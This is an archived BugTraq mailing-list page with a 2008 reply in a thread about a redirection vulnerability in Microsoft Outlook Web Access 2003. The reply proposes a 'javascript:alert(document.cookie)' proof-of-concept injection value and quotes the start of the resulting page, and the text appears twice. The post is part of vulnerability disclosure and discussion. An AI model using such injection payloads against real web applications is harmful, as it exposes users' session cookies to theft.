BugTraq
Back to list
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
Re: MS OWA 2003 Redirection Vulnerability
Oct 15 2008 05:51PM
Stefano Di Paola (stefano dipaola wisec it)
Did you try setting it to :
javascript:alert(document.cookie)
If there are no/dumb filters you'll get
<!--Copyright (c) 2000-2003 Microsoft Corporation. All rights
reserved.-->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
<html><head>
<script>
try
{
window.location = ...
[ more ]
Privacy Statement
Copyright 2010, SecurityFocus
javascript:alert(document.cookie)
If there are no/dumb filters you'll get
<!--Copyright (c) 2000-2003 Microsoft Corporation. All rights
reserved.-->
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
<html><head>
<script>
try
{
window.location = ...
[ more ]